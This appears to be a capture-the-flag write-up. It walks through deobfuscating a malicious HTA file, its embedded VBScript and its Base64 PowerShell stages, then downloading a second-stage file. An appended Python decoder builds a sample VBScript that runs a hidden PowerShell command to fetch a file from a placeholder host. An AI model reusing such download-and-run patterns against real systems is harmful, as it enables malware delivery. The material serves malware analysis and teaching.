A routine patrol through the Frontier Cluster's shadowy corners uncovered a sinister file embedded in a bounty report—one targeting Jack Colt himself. The file's obfuscated layers suggest it's more than a simple message; it's a weaponized code from the Frontier Board, aiming to tighten their grip on the stars. As a trusted ally, it's your task to peel back the layers of deception, trace its origin, and turn their tools against them.

Note: Ensure all domains discovered in the challenge resolve to your Docker instance, including the appropriate port when accessing URLs.
We are given a heavily obfuscated HTA file to solve and an IP address that is of no use yet. I used CyberChef to clean the file up a bit so I could read its contents.
From that, we can see that there is a VBScript hidden inside. If we scroll a bit further, we can also see a PowerShell script encoded using Base64.
After decoding the Base64 string, I found a URL that hosts another VBScript file. Since the domain doesn't exist, this must be the hostname for the IP address that we are given.
After editing my /etc/hosts to map that hostname to the provided IP, I can now download the wanted.tIF file. It's a long file, but there is one interesting part of the code where it spawns a shell.
Since I am a bit too lazy to reverse all of this, let's just run it with the part that executes the payload removed. The value of the sandareso variable is yet another PowerShell command encoded using Base64.
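The steps above (find the Base64 blob in the HTA, decode it as the UTF-16LE text that PowerShell's -EncodedCommand expects, pull the URL out, map its hostname to the given IP, then repeat the decoding on the downloaded file) can be scripted instead of pasted into CyberChef. The following is an added example and not the author's code or anything from the challenge files: the HTA snippet, the stage-two text, the hostname frontier-placeholder.example and the IP 10.10.10.10 are all constructed stand-ins, and the only value taken from the write-up is the file name wanted.tIF.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# A Base64 run long enough to be a payload rather than an incidental identifier.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?[^\s\"'<>)]*")


def encode_ps(cmd: str) -> str:
    """Encode a command the way PowerShell's -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode()


def decode_blob(blob: str) -> Optional[str]:
    """Decode one Base64 run; return None if it is not valid Base64."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (ValueError, binascii.Error):
        return None
    # UTF-16LE ASCII text has a NUL in every second byte; that marks an -EncodedCommand payload.
    if len(raw) >= 2 and raw[1:2] == b"\x00":
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def peel(text: str, max_depth: int = 5) -> Tuple[List[str], List[str]]:
    """Decode nested Base64 layers; return (layers outermost first, sorted URLs seen in any layer)."""
    layers = [text]
    urls = set(URL_RE.findall(text))
    frontier = [text]
    for _ in range(max_depth):
        next_frontier = []
        for layer in frontier:
            for blob in B64_RE.findall(layer):
                decoded = decode_blob(blob)
                if decoded is None:
                    continue
                layers.append(decoded)
                urls.update(URL_RE.findall(decoded))
                next_frontier.append(decoded)
        if not next_frontier:
            break
        frontier = next_frontier
    return layers, sorted(urls)


def hosts_line(ip: str, url: str) -> str:
    """Build the /etc/hosts entry that points the URL's hostname at the challenge IP."""
    return f"{ip} {urlsplit(url).hostname}"


# Constructed stage one: a stripped-down stand-in for the obfuscated HTA.
STAGE1_CMD = '(New-Object Net.WebClient).DownloadString("http://frontier-placeholder.example:8080/wanted.tIF")'
SAMPLE_HTA = (
    '<script language="VBScript">\n'
    'Dim cmd: cmd = "powershell -enc ' + encode_ps(STAGE1_CMD) + '"\n'
    'CreateObject("WScript.Shell").Run cmd, 0\n'
    "</script>"
)

# Constructed stage two: mimics the sandareso variable holding another encoded command.
STAGE2_CMD = 'Write-Host "placeholder for the final stage"'
STAGE2_TEXT = (
    "Dim sandareso\n"
    'sandareso = "' + encode_ps(STAGE2_CMD) + '"\n'
    'CreateObject("WScript.Shell").Run "powershell -enc " & sandareso, 0\n'
)

if __name__ == "__main__":
    layers, urls = peel(SAMPLE_HTA)
    print("stage 1 decoded:", layers[1])
    for url in urls:
        print("hosts entry:", hosts_line("10.10.10.10", url))  # constructed IP
    layers2, _ = peel(STAGE2_TEXT)
    print("stage 2 decoded:", layers2[1])
```

The UTF-16LE check matters: decoding an -EncodedCommand blob as UTF-8 yields text with a NUL after every character, which is what makes such payloads look like gibberish in a plain Base64 decoder.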